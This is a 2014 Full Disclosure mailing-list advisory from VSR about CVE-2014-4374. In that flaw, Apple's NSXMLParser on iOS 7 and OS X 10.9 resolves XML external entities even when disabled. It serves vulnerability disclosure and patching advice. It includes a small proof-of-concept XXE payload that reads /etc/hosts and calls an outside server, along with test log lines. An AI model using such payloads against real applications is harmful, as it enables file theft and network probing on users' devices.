Full Disclosure mailing list archives

By Date By Thread Apple iOS / OSX Foundation NSXMLParser XML eXternal Entity (XXE) Flaw From: VSR Advisories <advisories () vsecurity com>

Date: Thu, 18 Sep 2014 01:16:02 -0400

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 VSR Security Advisory http://www.vsecurity.com/ =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Advisory Name: Apple Foundation NSXMLParser XML eXternal Entity (XXE) Flaw Release Date: 2014-09-17 Application: Apple iOS Foundation Framework Apple OS X Foundation Framework Versions: iOS 7.0, 7.1, OS X 10.9 - 10.9.4 Severity: High Author: George D. Gal <ggal (at) vsecurity.com> Vendor Status: Fix Available CVE Candidate: CVE-2014-4374 Reference: http://www.vsecurity.com/resources/advisory/20140917-1/ http://support.apple.com/kb/HT1222 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Product Description ~-----------------~ - From [1]: "Xcode includes software development kits (SDKs) that enable you to create applications that run on specific versions of iOS or OS X?including versions different from the one you are developing on. This technology lets you build a single binary that takes advantage of new features when running on a system that supports them, and gracefully degrades when running on an older system. Some Apple frameworks automatically modify their behavior based on the SDK an application is built against for improved compatibility." Vulnerability Overview ~--------------------~ In May 2014, VSR identified a vulnerability in versions 7.0 and 7.1 of the iOS SDK whereby the NSXMLParser class, resolves XML External Entities by default despite documentation which indicates otherwise. In addition, settings to change the behavior of XML External Entity resolution appears to be non-functional. This vulnerability, commonly known as XXE (XML eXternal Entities) attacks could allow for an attacker's ability to use the XML parser to carry out attacks ranging from network port scanning, information disclosure, denial of service, and potentially to carry out remote file retrieval. Further review also revealed that the Foundation Framework used in OS X 10.9.x is also vulnerable. The severity of this vulnerability varies. For example, in situations where the application does not reflect user influenced XML, retrieval of files may be limited, however using external HTTP entities could be used to conduct port scans. In other scenarios if core iOS applications transmit XML over plaintext protocols, these protocols could potentially be intercepted to leak contents of any file on the mobile device. For App Store applications files which could be accessed may be limited to those under the individual chrooted application directories, or in the case of jailbroken devices, any file on the filesystem. Vulnerability Details ~-------------------~ Apple's NSXMLParser documentation [2] indicates that external entity resolution is disabled in the parser by default. However, inspection of multiple applications running on iOS 7.0 and 7.1 now appear to resolve external entities by default, and even when attempting to disable entity resolution explicitly as shown below: [nsXmlParser setShouldResolveExternalEntities:NO]; The following source code demonstrates the flaw: - - (void) doParse:(NSData *)data { // create and init NSXMLParser object NSXMLParser *nsXmlParser = [[NSXMLParser alloc] initWithData:data]; // Why does the following not even work!? [nsXmlParser setShouldResolveExternalEntities:NO]; // create and init our delegate VSRParser *parser = [[VSRParser alloc] initXMLParser]; // set delegate [nsXmlParser setDelegate:parser]; // parsing... BOOL success = [nsXmlParser parse]; // test the result if (success) { NSLog(@"No errors"); NSMutableArray *stuff = [parser tests]; } else { NSLog(@"Error parsing document!"); } [parser release]; [nsXmlParser release]; } When using a vulnerable input XML file as shown below, the XML parser attempts to perform network name resolution and access the resource defined by &http; <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE roottag [ <!ENTITY http SYSTEM "http://iossdk-xxe.apt.vsecurity.org/"> <!ENTITY file SYSTEM "file:///etc/hosts"> ]> <test> <vsr> <tag1>&file;</tag1> <tag2>&http;</tag2> </vsr> </test> The following DNS and web server log entries demonstrate attempts to resolve &http; 2014-05-19_13:26:28.31088 ... iossdk-xxe.apt.vsecurity.org XX.XX.XX.XX - - [19/May/2014:09:26:28 -0400] "GET /xxe HTTP/1.0" 404 446 "-" "-" In more serious exploitation scenarios, plaintext XML communications between a server and iOS mobile application, or OS X client application could be intercepted and modified in transit to reference a file present on the client device. If the device reflects this value in subsequent communications or errors the contents of files stored on the device could be leaked to an attacker Versions Affected ~---------------~ VSR's analysis revealed that the IOS 7.0, 7.1 SDKs are vulnerable, while earlier versions of IOS and the IOS SDK do not appear to be affected. This vulnerability affects the Mac OSX Foundation, however VSR has not verified the earliest version of the Foundation framework for OSX which is affected. Vendor Response ~-------------~ The following timeline details Apple's response to the reported issue: 2014-05-19 Apple was provided a draft advisory. 2014-07-10 Apple confirms issues to be fixed in iOS 8 and OSX Yosemite 2014-09-17 Apple releases iOS 8 and OS X 10.9.5 which is presumed to fix this vulnerability. Recommendation ~------------~ This vulnerability will require an updated version of iOS and OS X from Apple, as even built-in methods for disabling XXE appears to be non-functional. Users should update their devices to iOS 8 and OS X Mavericks 10.9.5 with the Software Update [3] mechanism. Common Vulnerabilities and Exposures (CVE) Information ~----------------------------------------------------~ The Common Vulnerabilities and Exposures (CVE) project has assigned the number CVE-2014-4374 to this issue. This is a candidates for inclusion in the CVE list (http://cve.mitre.org), which standardizes names for security problems. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= References: 1. https://developer.apple.com/library/ios/documentation/DeveloperTools/Conceptual/cross_development/Introduction/Introduction.html#//apple_ref/doc/uid/10000163-BCICHGIE 2. https://developer.apple.com/library/ios/documentation/Cocoa/Reference/Foundation/Classes/NSXMLParser_Class/Reference/Reference.html 3. http://support.apple.com/kb/HT1222 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= This advisory is distributed for educational purposes only with the sincere hope that it will help promote public safety. This advisory comes with absolutely NO WARRANTY; not even the implied warranty of merchantability or fitness for a particular purpose. Neither Virtual Security Research, LLC nor the author accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. See the VSR disclosure policy for more information on our responsible disclosure practices: http://www.vsecurity.com/company/disclosure =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Copyright 2014 Virtual Security Research, LLC. All rights reserved. -----BEGIN PGP SIGNATURE----- Version: GnuPG/MacGPG2 v2.0.22 (Darwin) iQIcBAEBAgAGBQJUGmqRAAoJENaINF9fnpkCIagQALsuOKz/weeF23bAp+Dm3lS7 +OXecSr9eXdpg1APxD/FDzW6LH5iA9GDsTxH/I6UEJh9HiZNGRy8TA9Oyjx//4eB hWV5XaeRgNlGEXxGQK0DtIVlzucc99pIIkyu7/khy4Mwp97cx+vea3vJp08pBHhB YPCpj1e3TQn5+zGmHShF+/xrH9XTnToW3UFofTzlRXhcQnFfxLVdqls9rTfuNxqx gOGSddi00ADe30Mw9ho8UX8Yvusn94w5ooupZn/42ALFxD4Lwz0dPJMh0cORYGym 7K7R+lwwlnN86r82/z0xL2bzDwCIEnh+WwsGWS4kinYVtexkF6fWJYxzh3OaL/nz 9lXj1bz/GrdQ/F6j8LLT9Pi3g7slu7MHR9wcbjQ2aE+Ta5Tiwfwhek4owrp5BpAD DQ8KR14U3Dt19AESZHWLPZeR5Y2GaioqNnAV2m2ii+czvEENgndPRnEW//qwmSE2 qlr6lJb2dKVToAWqbxapGWEg0svB5S3860NvMT974/KLu34ZWGoXSV7C4qNl74PD p9PSQLofgeF1W/uFVS3QfzgMfPm8fAb2kDFwHYnzMc7mdk+7JdGM+qFjVk0bQV00 w1DdgalMjyWKIWU8BUx4O8USKkSv1bND8tMVDGpPCWucTRICH6sHv/O+IYpitHSN tgkMIN+WAHh4HzB19bGD =C7k3 -----END PGP SIGNATURE----- _______________________________________________ Sent through the Full Disclosure mailing list http://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/ By Date By Thread Current thread: Apple iOS / OSX Foundation NSXMLParser XML eXternal Entity (XXE) Flaw VSR Advisories (Sep 18)